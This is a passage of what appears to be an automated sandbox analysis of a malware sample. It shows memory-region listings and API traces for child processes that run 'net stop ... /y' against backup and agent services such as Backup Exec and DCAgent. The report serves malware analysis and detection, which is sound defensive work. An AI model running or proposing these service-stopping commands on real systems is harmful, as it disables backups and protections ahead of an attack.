= "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5085 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5086 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5087 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5088 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5089 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5090 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5091 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5092 start_va = 0xff740000 end_va = 0xff772fff entry_point = 0xff740000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5093 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5094 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5095 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 5096 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5097 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5098 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5099 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5115 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5116 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5117 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5118 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 5119 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5120 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5121 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5122 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5123 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5124 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5125 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5126 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5127 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5128 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5129 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5130 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5131 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5132 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5133 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5134 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5135 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5136 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5137 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5153 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 497 os_tid = 0x11ac [0090.131] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfbd0 | out: lpSystemTimeAsFileTime=0x1cfbd0*(dwLowDateTime=0xeae3eb50, dwHighDateTime=0x1d48689)) [0090.131] GetCurrentProcessId () returned 0x11a8 [0090.131] GetCurrentThreadId () returned 0x11ac [0090.131] GetTickCount () returned 0x205f8 [0090.131] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfbd8 | out: lpPerformanceCount=0x1cfbd8*=1813704900000) returned 1 [0090.133] GetModuleHandleW (lpModuleName=0x0) returned 0xff740000 [0090.133] __set_app_type (_Type=0x1) [0090.133] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff759c9c) returned 0x0 [0090.133] __getmainargs (in: _Argc=0xff764780, _Argv=0xff764790, _Env=0xff764788, _DoWildCard=0, _StartInfo=0xff76479c | out: _Argc=0xff764780, _Argv=0xff764790, _Env=0xff764788) returned 0 [0090.133] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.134] GetConsoleOutputCP () returned 0x1b5 [0090.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff76cec0 | out: lpCPInfo=0xff76cec0) returned 1 [0090.134] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.136] sprintf_s (in: _DstBuf=0x1cfb78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0090.137] setlocale (category=0, locale=".437") returned="English_United States.437" [0090.138] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0090.138] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.138] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecDeviceMediaService /y" [0090.138] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0090.138] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0090.138] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfb68 | out: Buffer=0x1cfb68*=0x21c100) returned 0x0 [0090.138] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfb68 | out: Buffer=0x1cfb68*=0x21c120) returned 0x0 [0090.138] _fileno (_File=0x7fefdba2a80) returned 0 [0090.138] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0090.139] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0090.139] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0090.139] _wcsicmp (_String1="config", _String2="stop") returned -16 [0090.139] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0090.139] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0090.139] _wcsicmp (_String1="file", _String2="stop") returned -13 [0090.139] _wcsicmp (_String1="files", _String2="stop") returned -13 [0090.139] _wcsicmp (_String1="group", _String2="stop") returned -12 [0090.139] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0090.139] _wcsicmp (_String1="help", _String2="stop") returned -11 [0090.139] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0090.139] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0090.139] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0090.139] _wcsicmp (_String1="session", _String2="stop") returned -15 [0090.139] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0090.139] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0090.139] _wcsicmp (_String1="share", _String2="stop") returned -12 [0090.139] _wcsicmp (_String1="start", _String2="stop") returned -14 [0090.139] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0090.139] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0090.139] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0090.139] _wcsicmp (_String1="accounts", _String2="BackupExecDeviceMediaService") returned -1 [0090.139] _wcsicmp (_String1="computer", _String2="BackupExecDeviceMediaService") returned 1 [0090.139] _wcsicmp (_String1="config", _String2="BackupExecDeviceMediaService") returned 1 [0090.139] _wcsicmp (_String1="continue", _String2="BackupExecDeviceMediaService") returned 1 [0090.139] _wcsicmp (_String1="cont", _String2="BackupExecDeviceMediaService") returned 1 [0090.139] _wcsicmp (_String1="file", _String2="BackupExecDeviceMediaService") returned 4 [0090.139] _wcsicmp (_String1="files", _String2="BackupExecDeviceMediaService") returned 4 [0090.139] _wcsicmp (_String1="group", _String2="BackupExecDeviceMediaService") returned 5 [0090.139] _wcsicmp (_String1="groups", _String2="BackupExecDeviceMediaService") returned 5 [0090.140] _wcsicmp (_String1="help", _String2="BackupExecDeviceMediaService") returned 6 [0090.140] _wcsicmp (_String1="helpmsg", _String2="BackupExecDeviceMediaService") returned 6 [0090.140] _wcsicmp (_String1="localgroup", _String2="BackupExecDeviceMediaService") returned 10 [0090.140] _wcsicmp (_String1="pause", _String2="BackupExecDeviceMediaService") returned 14 [0090.140] _wcsicmp (_String1="session", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="sessions", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="sess", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="share", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="start", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="stats", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="statistics", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="stop", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="time", _String2="BackupExecDeviceMediaService") returned 18 [0090.140] _wcsicmp (_String1="user", _String2="BackupExecDeviceMediaService") returned 19 [0090.140] _wcsicmp (_String1="users", _String2="BackupExecDeviceMediaService") returned 19 [0090.140] _wcsicmp (_String1="msg", _String2="BackupExecDeviceMediaService") returned 11 [0090.140] _wcsicmp (_String1="messenger", _String2="BackupExecDeviceMediaService") returned 11 [0090.140] _wcsicmp (_String1="receiver", _String2="BackupExecDeviceMediaService") returned 16 [0090.140] _wcsicmp (_String1="rcv", _String2="BackupExecDeviceMediaService") returned 16 [0090.140] _wcsicmp (_String1="netpopup", _String2="BackupExecDeviceMediaService") returned 12 [0090.140] _wcsicmp (_String1="redirector", _String2="BackupExecDeviceMediaService") returned 16 [0090.140] _wcsicmp (_String1="redir", _String2="BackupExecDeviceMediaService") returned 16 [0090.140] _wcsicmp (_String1="rdr", _String2="BackupExecDeviceMediaService") returned 16 [0090.140] _wcsicmp (_String1="workstation", _String2="BackupExecDeviceMediaService") returned 21 [0090.140] _wcsicmp (_String1="work", _String2="BackupExecDeviceMediaService") returned 21 [0090.140] _wcsicmp (_String1="wksta", _String2="BackupExecDeviceMediaService") returned 21 [0090.140] _wcsicmp (_String1="prdr", _String2="BackupExecDeviceMediaService") returned 14 [0090.140] _wcsicmp (_String1="devrdr", _String2="BackupExecDeviceMediaService") returned 2 [0090.140] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecDeviceMediaService") returned 10 [0090.140] _wcsicmp (_String1="server", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="svr", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="srv", _String2="BackupExecDeviceMediaService") returned 17 [0090.140] _wcsicmp (_String1="lanmanserver", _String2="BackupExecDeviceMediaService") returned 10 [0090.140] _wcsicmp (_String1="alerter", _String2="BackupExecDeviceMediaService") returned -1 [0090.140] _wcsicmp (_String1="netlogon", _String2="BackupExecDeviceMediaService") returned 12 [0090.141] _wcsupr (in: _String="BackupExecDeviceMediaService" | out: _String="BACKUPEXECDEVICEMEDIASERVICE") returned="BACKUPEXECDEVICEMEDIASERVICE" [0090.141] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x21ce30 [0090.161] GetServiceKeyNameW (in: hSCManager=0x21ce30, lpDisplayName="BACKUPEXECDEVICEMEDIASERVICE", lpServiceName=0xff765750, lpcchBuffer=0x1cfa88 | out: lpServiceName="", lpcchBuffer=0x1cfa88) returned 0 [0090.162] _wcsicmp (_String1="msg", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 11 [0090.162] _wcsicmp (_String1="messenger", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 11 [0090.162] _wcsicmp (_String1="receiver", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0090.162] _wcsicmp (_String1="rcv", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0090.162] _wcsicmp (_String1="redirector", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0090.162] _wcsicmp (_String1="redir", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0090.162] _wcsicmp (_String1="rdr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0090.162] _wcsicmp (_String1="workstation", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 21 [0090.162] _wcsicmp (_String1="work", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 21 [0090.162] _wcsicmp (_String1="wksta", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 21 [0090.162] _wcsicmp (_String1="prdr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 14 [0090.162] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 2 [0090.162] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 10 [0090.163] _wcsicmp (_String1="server", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 17 [0090.163] _wcsicmp (_String1="svr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 17 [0090.163] _wcsicmp (_String1="srv", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 17 [0090.163] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 10 [0090.163] _wcsicmp (_String1="alerter", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned -1 [0090.163] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 12 [0090.163] NetServiceControl (in: servername=0x0, service="BACKUPEXECDEVICEMEDIASERVICE", opcode=0x0, arg=0x0, bufptr=0x1cfa90 | out: bufptr=0x1cfa90) returned 0x889 [0090.163] wcscpy_s (in: _Destination=0xff7680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0090.163] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0090.164] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff765b50, nSize=0x800, Arguments=0xff767f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0090.165] GetFileType (hFile=0xb) returned 0x2 [0090.165] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0090.165] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff765b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xff765b50*, lpNumberOfCharsWritten=0x1cf950*=0x1e) returned 1 [0090.166] GetFileType (hFile=0xb) returned 0x2 [0090.166] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0090.166] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff741efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xff741efc*, lpNumberOfCharsWritten=0x1cf950*=0x2) returned 1 [0090.166] _ultow (in: _Dest=0x889, _Radix=1898944 | out: _Dest=0x889) returned="2185" [0090.166] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff765b50, nSize=0x800, Arguments=0xff767f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0090.166] GetFileType (hFile=0xb) returned 0x2 [0090.167] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0090.167] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff765b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xff765b50*, lpNumberOfCharsWritten=0x1cf950*=0x34) returned 1 [0090.167] GetFileType (hFile=0xb) returned 0x2 [0090.167] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0090.167] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff741efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xff741efc*, lpNumberOfCharsWritten=0x1cf950*=0x2) returned 1 [0090.168] NetApiBufferFree (Buffer=0x21c100) returned 0x0 [0090.168] NetApiBufferFree (Buffer=0x21c120) returned 0x0 [0090.168] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecDeviceMediaService /y" [0090.168] exit (_Code=2) Process: id = "101" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6c617000" os_pid = "0x11b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop BackupExecVSSProvider /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5102 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5103 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5104 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5105 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5106 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5107 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5108 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5109 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5110 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5111 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5112 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 5113 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5114 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 498 os_tid = 0x11bc Process: id = "102" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6ca36000" os_pid = "0x11d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop bedbg /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5138 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5139 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5140 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5141 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 5142 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5143 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5144 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5145 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5146 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5147 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5148 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5149 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5150 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 5151 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5152 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 500 os_tid = 0x11d4 Process: id = "103" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6f555000" os_pid = "0x1200" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop DCAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5154 